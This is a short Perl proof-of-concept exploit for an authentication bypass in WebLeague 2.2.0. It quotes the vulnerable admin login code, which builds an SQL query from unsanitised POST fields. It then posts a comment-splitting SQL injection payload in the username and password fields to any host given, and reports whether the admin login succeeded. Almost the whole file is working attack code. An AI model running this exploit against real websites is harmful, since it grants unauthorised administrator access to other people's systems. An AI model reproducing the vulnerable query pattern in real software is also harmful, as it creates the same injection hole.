#!/usr/bin/perl -W # # WebLeague 2.2.0 Remote Admin Bypass p0c # written by ka0x <ka0x01[at]gmail.com> # # need magic_quotes_gpc = Off # # Vuln code (Admin/index.php) : # # 10: $sql="SELECT * FROM $admintable WHERE name = '$_POST[username]' AND password = '$_POST[password]'"; // ---> NOT CLEAN $_POST VARS # 11: $result=mysql_query($sql,$db); # 12: $number = mysql_num_rows($result); # 13: if ($number == "1") { #
use LWP::UserAgent ;
my $timeout = 10 ;
die "* USAGE: \tperl $0 <host>\n" unless $ARGV[0] ;
my $host = $ARGV[0] ;
$host = 'http://'.$host if( $host !~ /^http:/ ) ; $host = $host.'/' unless( substr( $host, -1 ) eq '/' ) ;
my $ua = LWP::UserAgent->new() or die; $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ; $ua->timeout( $timeout ) ;
my $req = HTTP::Request->new( POST => $host.'Admin/index.php' ); $req->content_type( 'application/x-www-form-urlencoded' ) ; $req->content( 'username=\'/*&password=*/ or \'\'=\'' ) ; # content $_POST vars: # username= '/* # password= */ or ''=' my $res = $ua->request( $req ) ;
if( $res->content =~ /You are logged in as/i ){ print "[+] The website is vulnerable." ; } else { print "[-] The website isn't vulnerable." ; }
__END__
|